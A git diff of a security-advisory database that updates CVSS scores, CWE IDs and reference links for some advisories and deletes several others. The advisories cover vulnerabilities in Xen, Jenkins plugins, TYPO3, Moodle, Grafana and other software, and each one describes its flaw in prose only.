"github_reviewed_at": null, - "nvd_published_at": "2018-05-08T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json b/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json index 9f7349d15570a..6b5eaa33031d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json +++ b/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-397g-22v6-9m75", - "modified": "2022-05-24T19:21:18Z", + "modified": "2024-02-04T09:30:31Z", "published": "2022-05-24T19:21:18Z", "aliases": [ "CVE-2021-28705" ], "details": "issues with partially successful P2M updates on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). In some cases the hypervisor carries out the requests by splitting them into smaller chunks. Error handling in certain PoD cases has been insufficient in that in particular partial success of some operations was not properly accounted for. There are two code paths affected - page removal (CVE-2021-28705) and insertion of new pages (CVE-2021-28709). (We provide one patch which combines the fix to both issues.)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28705" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -26,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json b/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json deleted file mode 100644 index f112ce9f60ea3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-39vm-rvwh-q86j", - "modified": "2022-05-14T02:42:14Z", - "published": "2022-05-14T02:42:14Z", - "aliases": [ - "CVE-2010-4616" - ], - "details": "Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4616" - }, - { - "type": "WEB", - "url": "http://community.impresscms.org/modules/smartsection/item.php?itemid=525" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/42695" - }, - { - "type": "WEB", - "url": "http://www.htbridge.ch/advisory/xss_vulnerability_in_impresscms.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/515397/100/0/threaded" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-12-29T22:33:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json b/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json deleted file mode 100644 index 7a3e4b2e2d5c9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3ccq-gccx-pm7j", - "modified": "2022-05-13T01:18:46Z", - "published": "2022-05-13T01:18:46Z", - "aliases": [ - "CVE-2018-1000425" - ], - "details": "An insufficiently protected credentials vulnerability exists in Jenkins SonarQube Scanner Plugin 2.8 and earlier in SonarInstallation.java that allows attackers with local file system access to obtain the credentials used to connect to SonarQube.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000425" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1163" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json b/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json deleted file mode 100644 index f58db32fa4df7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3cqw-pxgr-jhrm", - "modified": "2022-05-02T03:46:56Z", - "published": "2022-05-02T03:46:56Z", - "aliases": [ - "CVE-2009-3631" - ], - "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2, when the DAM extension or ftp upload is enabled, allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3631" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53923" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-94" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json b/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json deleted file mode 100644 index f76da018e4afe..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3fpx-g9h3-hh8x", - "modified": "2023-02-11T21:30:24Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10430" - ], - "details": "Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10430" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1504" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-312" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json b/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json deleted file mode 100644 index e8c1f8a361c06..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3gm8-32vv-q8mp", - "modified": "2022-05-13T01:13:04Z", - "published": "2022-05-13T01:13:04Z", - "aliases": [ - "CVE-2010-2230" - ], - "details": "The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2230" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=605809" - }, - { - "type": "WEB", - "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.812.2.114&r2=1.812.2.115" - }, - { - "type": "WEB", - "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.970.2.171&r2=1.970.2.172" - }, - { - "type": "WEB", - "url": "http://docs.moodle.org/en/Moodle_1.8.13_release_notes" - }, - { - "type": "WEB", - "url": "http://docs.moodle.org/en/Moodle_1.9.9_release_notes" - }, - { - "type": "WEB", - "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043285.html" - }, - { - "type": "WEB", - "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043291.html" - }, - { - "type": "WEB", - "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043340.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html" - }, - { - "type": "WEB", - "url": "http://moodle.org/mod/forum/discuss.php?d=152368" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40248" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40352" - }, - { - "type": "WEB", - "url": "http://tracker.moodle.org/browse/MDL-22042" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2010/06/21/2" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1530" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1571" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-06-28T17:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json b/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json index 91a97830d0720..29357bcd7b617 100644 --- a/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json +++ b/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json @@ -65,7 +65,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json b/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json index 13853c2cc1e59..ffab089e9d675 100644 --- a/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json +++ b/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json @@ -53,7 +53,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json b/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json deleted file mode 100644 index 2d6c3da10aaba..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3jq7-8ph8-63xm", - "modified": "2022-05-24T17:16:53Z", - "published": "2022-05-24T17:16:53Z", - "aliases": [ - "CVE-2020-12458" - ], - "details": "An information-disclosure flaw was found in Grafana through 6.7.3. The database directory /var/lib/grafana and database file /var/lib/grafana/grafana.db are world readable. This can result in exposure of sensitive information (e.g., cleartext or encrypted datasource passwords).", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12458" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/issues/8283" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2020-12458" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200518-0001/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-312", - "CWE-732" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-04-29T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json b/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json deleted file mode 100644 index 1c86440a6828a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3jx9-mgwx-4q83", - "modified": "2022-05-14T02:42:51Z", - "published": "2022-05-14T02:42:51Z", - "aliases": [ - "CVE-2010-3863" - ], - "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62959" - }, - { - "type": "WEB", - "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html" - }, - { - "type": "WEB", - "url": "http://osvdb.org/69067" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/41989" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/514616/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/44616" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/2888" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-11-05T17:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json b/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json deleted file mode 100644 index 03143c70ae8fd..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3mqf-fwc6-vwqw", - "modified": "2022-05-17T01:55:58Z", - "published": "2022-05-17T01:55:58Z", - "aliases": [ - "CVE-2010-5098" - ], - "details": "Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5098" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64179" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/35770" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/70122" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45470" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-05-21T20:55:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json b/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json index bfee13bd9d917..fa8a94f65f15a 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json +++ b/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3mr8-9w83-x659", - "modified": "2022-05-24T19:19:13Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-24T19:19:13Z", "aliases": [ "CVE-2021-41645" ], "details": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. .", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json b/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json index c2a2a6233fcb7..75d69fb04fe81 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json +++ b/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3p99-663g-4p22", - "modified": "2022-05-02T03:47:20Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T03:47:20Z", "aliases": [ "CVE-2009-3658" ], "details": "Use-after-free vulnerability in the Sb.SuperBuddy.1 ActiveX control (sb.dll) in America Online (AOL) 9.5.0.1 allows remote attackers to trigger memory corruption or possibly execute arbitrary code via a malformed argument to the SetSuperBuddy method.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json b/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json deleted file mode 100644 index 3cb7e335b006c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3q6p-r6rr-266x", - "modified": "2022-05-14T00:58:29Z", - "published": "2022-05-14T00:58:29Z", - "aliases": [ - "CVE-2017-1000113" - ], - "details": "The Deploy to container Plugin stored passwords unencrypted as part of its configuration. This allowed users with Jenkins master local file system access, or users with Extended Read access to the jobs it is used in, to retrieve those passwords. The Deploy to container Plugin now integrates with Credentials Plugin to store passwords securely, and automatically migrates existing passwords.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000113" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json b/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json index f6271062631f6..0043d6097ca03 100644 --- a/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json +++ b/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3qj8-w38x-qmxh", - "modified": "2022-05-01T02:03:35Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:03:35Z", "aliases": [ "CVE-2005-1947" ], "details": "Cross-site request forgery (CSRF) vulnerability in Invision Gallery before 1.3.1 allows remote attackers to delete albums and images as another user via a link or IMG tag to the (1) albums or (2) delimg actions.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json b/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json deleted file mode 100644 index 949fca33a731e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3rrg-p8xc-3457", - "modified": "2022-05-14T03:33:40Z", - "published": "2022-05-14T03:33:40Z", - "aliases": [ - "CVE-2018-1000113" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins TestLink Plugin 2.12 and earlier in TestLinkBuildAction/summary.jelly and others that allow an attacker who can control e.g. TestLink report names to have Jenkins serve arbitrary HTML and JavaScript", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000113" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-731" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-03-13T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json b/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json deleted file mode 100644 index d98e6588b31b5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3vcx-w94h-68vg", - "modified": "2022-05-14T03:40:06Z", - "published": "2022-05-14T03:40:06Z", - "aliases": [ - "CVE-2018-1000055" - ], - "details": "Jenkins Android Lint Plugin 2.5 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000055" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-05/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-02-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json b/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json index 70204836e539c..6541143e89465 100644 --- a/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json +++ b/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-42cx-qwh9-c3xj", - "modified": "2022-05-01T18:01:33Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:01:33Z", "aliases": [ "CVE-2007-2237" ], "details": "Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -57,7 +60,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-369" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json b/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json deleted file mode 100644 index adb273651f251..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-449p-7c3p-vf7g", - "modified": "2022-05-13T01:25:42Z", - "published": "2022-05-13T01:25:42Z", - "aliases": [ - "CVE-2019-1003082" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003082" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git 